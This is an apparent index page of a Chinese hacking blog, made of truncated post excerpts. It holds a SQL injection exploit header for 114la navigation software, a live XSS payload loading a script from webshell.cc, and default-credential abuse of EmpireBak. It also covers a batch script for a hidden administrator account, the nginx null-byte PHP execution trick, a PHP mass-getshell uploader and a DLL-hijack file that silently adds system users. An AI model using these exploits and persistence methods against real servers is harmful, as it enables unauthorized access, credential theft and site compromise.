WebShell'S Blog

雨林木风的114啦网址导航程序留言文件存在注入漏洞。攻击者利用EXP 可以得到管理员帐号和MD5密码。 版本：<=1.5 EXP如下： <?php $sbcopyright=' ---------------------------------------- 114la feedback injection Vul Exploit By xZL Team: www.0kee.com 2...

- 阅读全文 -

描述：XSS很邪恶~ 详细说明：http://www.verydz.com/login.php?goto_page="><script src=https://www.webshell.cc/test.js></script>

- 阅读全文 -

帝国备份王(Empirebak)简介 EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库. 可在 http://www.phome.net/ebak2008os/ 下载到 默认账号密码为 admin 123456 登陆后先备份一次数据 备份时可选择备份到的目录。。默认有个safemod 当然也可以是别的..这里以s...

- 阅读全文 -

网上看了很多复制administator权限帐号的方法或者工具，比如建立admin$，所谓的隐藏帐号。 并复制administrator的权限。 其实这是暂时、一次性隐藏而已，服务器重启一下通过“计算机管理”或者net user 都能看到的。 本批处理根据服务器的情况，结合自己的研究，使用服务器本地iis帐号IUSR_计算机名， 设置密码位12345678（可以自己改一下批处理最后一行）。 这个来...

- 阅读全文 -

最近流行的数据库挂马的解决方法 前段时间，公司一个主要的网站数据库中个别表的数据经常被修改并挂马，由于网站是以前别人做的，代码有点乱，所以只看了与这几个表相关的文件代码。原因可能是接收参数的时候没有过滤危险字符，于是就加上了接受参数的格式化函数，数据库连接文件中也把接受参数时出现的“;”替换成“；”了。但是过了一天，又被挂马，分号替换没有起到作用。 　　于是搜索了一下，发现从3月份开始很多数据库S...

- 阅读全文 -

declare @delStr nvarchar(500) --set @delStr='<script src=https://www.webshell.cc/cn.js>' set @delStr='<script src=https://www.webshell.cc/cn.js></script>' /****************************...

- 阅读全文 -

常见的编辑器漏洞有: ewebeditor ewebeditornet fckeditor editor southidceditor SouthidcEditor bigcneditor 一:ewebeditor为例 1:默认下载下来的后台: https://www.webshell.cc/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard ...

- 阅读全文 -

这个绝对是大0day哦。非常给力。测试了几个大站。全OK。哈哈。跟上一次那个漏洞有的一比哦。 Ngnix在遇到%00空字节时与后端FastCGI处理不一致，导致可以在图片中嵌入PHP代码然后通过访问 webshell.jpg%00.php来执行其中的代码。影响版本：0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37。 请各位站长检查服务器版本，尽快升级...

- 阅读全文 -

这个是根据一篇文章来的思路 文章名字 好像叫做批量Getshell 一例吧 借用了里面在百度获取URL的代码！！自己写了上传shell的代码！ php学的不是很好，大牛们看了就别踩了！！ 这个主要是给大家批shell时拿来修改的！ 这个是测试图 贴出来代码： <?php print_r(' [*]  Getshell for Exploits [-]  by : [email]cfking@...

- 阅读全文 -

上传到sougou目录，注意不要改名字。等待该目录有文件联网的时候就自动添加系统账号了。 使用方法：把此文件放到QQ 迅雷 BT 等工具的同目录下。运行后会导致系统执行创建用户                   需要创建的用户名和密码可以十六进制修改。 Ps： 一个程序的启动它会调用很多dll或者ocx组件，但是他是有一个顺序的。 比如这个迅雷，他启动时会调用Ws2Help.dll这个组件， 一...

- 阅读全文 -